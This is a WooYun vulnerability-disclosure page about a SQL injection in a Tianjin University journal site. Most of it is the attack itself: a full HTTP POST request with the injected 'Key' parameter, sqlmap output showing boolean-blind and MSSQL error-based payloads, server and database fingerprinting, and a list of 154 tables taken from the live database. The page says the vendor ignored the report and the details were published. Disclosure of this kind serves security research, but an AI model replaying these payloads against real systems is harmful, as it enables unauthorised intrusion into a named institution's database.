当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155501

漏洞标题:天津大学某站存在sql注入漏洞(DBA权限)

相关厂商:tju.edu.cn

漏洞作者: 路人甲

提交时间:2015-11-24 15:02

修复时间:2015-11-29 15:04

公开时间:2015-11-29 15:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /ch/reader/wait_published_articles.aspx HTTP/1.1
Content-Length: 1977
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jmsc.tju.edu.cn
Cookie: ASP.NET_SessionId=ozyrudrrmn55mw55yrhioijr
Host: jmsc.tju.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Query=%b2%e9%d1%af&Key=-1' OR 1=1* -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7%2btaRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF%2b6FLnfwckKF6TzPWPA%2bfrcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh%2bti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP%2bjhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR%2bm14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx%2bvEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx%2b5PGeUL2mEuasNiwuScVpEK%2btDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ%2bddNr9jOaM4/%2bLBOZjqbuUWPaVNtUz2Y791zcp/eHzV%2be20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe%2bLqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK%2bdPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe%2bP%2b9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb%2bZcLmFaScQnDKpj9pF1UntwWle6f%2biMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6%2blYbRe25eU%2bC3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof%2bVyj9v3eog/hJIUJIPDkbuba%2bo8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV%2bRhLZm1I0b%2bv0ESSDyK%2bwooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O%2byG%2bc0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4%2bLjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv%2b51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY%2by3JqObqOE11aCqRQ%3d%3d&__VIEWSTATEENCRYPTED=

82.png

81.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 1059=1059 -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7+taRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF+6FLnfwckKF6TzPWPA+frcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh+ti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP+jhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR+m14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx+vEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx+5PGeUL2mEuasNiwuScVpEK+tDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ+ddNr9jOaM4/+LBOZjqbuUWPaVNtUz2Y791zcp/eHzV+e20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe+LqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK+dPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe+P+9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb+ZcLmFaScQnDKpj9pF1UntwWle6f+iMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6+lYbRe25eU+C3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof+Vyj9v3eog/hJIUJIPDkbuba+o8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV+RhLZm1I0b+v0ESSDyK+wooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O+yG+c0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4+LjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv+51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY+y3JqObqOE11aCqRQ==&__VIEWSTATEENCRYPTED=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 2755=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2755=2755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7+taRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF+6FLnfwckKF6TzPWPA+frcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh+ti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP+jhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR+m14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx+vEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx+5PGeUL2mEuasNiwuScVpEK+tDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ+ddNr9jOaM4/+LBOZjqbuUWPaVNtUz2Y791zcp/eHzV+e20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe+LqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK+dPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe+P+9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb+ZcLmFaScQnDKpj9pF1UntwWle6f+iMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6+lYbRe25eU+C3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof+Vyj9v3eog/hJIUJIPDkbuba+o8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV+RhLZm1I0b+v0ESSDyK+wooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O+yG+c0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4+LjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv+51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY+y3JqObqOE11aCqRQ==&__VIEWSTATEENCRYPTED=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: jmsc_journal
[154 tables]
+-----------------------------------------+
| GuestBook_Admin |
| GuestBook_Message |
| dtproperties |
| sysconstraints |
| syssegments |
| t_ad_click_detail |
| t_ad_cost |
| t_ad_customer |
| t_ad_position |
| t_ads |
| t_appraise_attache_list |
| t_article_appraise_bak |
| t_article_appraise_ext_bak |
| t_article_appraise_ext_history |
| t_article_appraise_history |
| t_article_attache_list |
| t_article_attache_list_all |
| t_article_attache_list_history |
| t_article_content |
| t_article_content_all |
| t_article_content_history |
| t_article_cost_history |
| t_article_duplicate_history |
| t_article_history |
| t_article_print_history |
| t_article_process_history_history |
| t_article_records_history |
| t_article_references_history |
| t_article_remark_history |
| t_article_view_history |
| t_article_view_history_indexed |
| t_audit_advice_attache_list |
| t_audit_advice_attache_list_all |
| t_audit_advice_attache_list_history |
| t_audit_advice_bak |
| t_audit_advice_content |
| t_audit_advice_content_all |
| t_audit_advice_content_bak |
| t_audit_advice_content_history |
| t_audit_advice_history |
| t_audit_cost_bak |
| t_audit_cost_history |
| t_auditor_menu |
| t_auditor_menu_category |
| t_auditor_menu_child |
| t_auditor_view_advice_history |
| t_auditor_view_attache_history |
| t_author_article_reference_history2 |
| t_author_article_reference_history_save |
| t_author_article_stat_history |
| t_author_concept_menu |
| t_author_info |
| t_author_menu |
| t_author_menu_category |
| t_author_menu_child |
| t_author_note |
| t_bargain_quarter_detail |
| t_bianwei |
| t_bianwei_info |
| t_bianwei_type |
| t_book_ad_bargain |
| t_book_ad_cost |
| t_book_ad_customer |
| t_book_ad_position |
| t_book_price |
| t_can_download_pdf_ip |
| t_cannot_download_pdf_ip |
| t_check_article_duplicate_history |
| t_column |
| t_column_category |
| t_concept_system_ext_menu |
| t_count_author_article |
| t_count_author_article_reference |
| t_counter |
| t_cross_article |
| t_cross_journal_list |
| t_customer_status |
| t_delete_four_key_data |
| t_delete_one_key_data |
| t_delete_three_key_data |
| t_delete_two_key_data |
| t_draft_article_attache_list |
| t_draft_article_content |
| t_edit_article_detail_content |
| t_edit_article_detail_content_all |
| t_edit_article_detail_content_history |
| t_edit_article_detail_history |
| t_edit_menu |
| t_edit_menu_category |
| t_edit_menu_child |
| t_edit_view_fulltext_history |
| t_editorial_concept_menu |
| t_editorial_menu |
| t_editorial_menu_category |
| t_editorial_menu_child |
| t_email_log |
| t_field_editorial_menu |
| t_field_editorial_menu_category |
| t_field_editorial_menu_child |
| t_file_content |
| t_fixed_content |
| t_fourth_menu |
| t_friend_link_category |
| t_friendlink |
| t_guestbook |
| t_guestbook_user |
| t_inquisition_cost_history |
| t_invoice_type |
| t_menu |
| t_menu_item |
| t_menu_subitem |
| t_news_category |
| t_news_second_category |
| t_nextcontent |
| t_nextcontent_author |
| t_order_toc_reader |
| t_other_journal_article_history |
| t_page_cost_history |
| t_post_elect_history |
| t_press |
| t_pub_article_attache_list |
| t_pub_author_article_reference |
| t_public_board |
| t_publish_article |
| t_publish_article_appraise |
| t_publish_article_appraise_list |
| t_publish_article_appraise_mood_list |
| t_publish_article_appraise_support |
| t_publish_article_appraise_type |
| t_publish_article_quick_search |
| t_publish_article_references |
| t_publish_article_was_referenced |
| t_publish_institution |
| t_reader_article_favorites |
| t_reader_menu |
| t_reader_menu_category |
| t_reader_menu_child |
| t_reviewer_concept_menu |
| t_send_author_book |
| t_sql_version |
| t_suggest_fence_auditor_history |
| t_wait_delete_article |
| t_wait_search_article |
| t_wait_search_author_article |
| t_wait_submit_article |
| t_wait_submit_delete_article |
| t_wait_submit_issue |
| t_wait_update_article |
| t_wait_update_issue |
| t_wait_zip_file |
| t_web_site_access |
| t_year |
| t_year_quarter |
| t_year_quarter_column |
+-----------------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-29 15:04

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无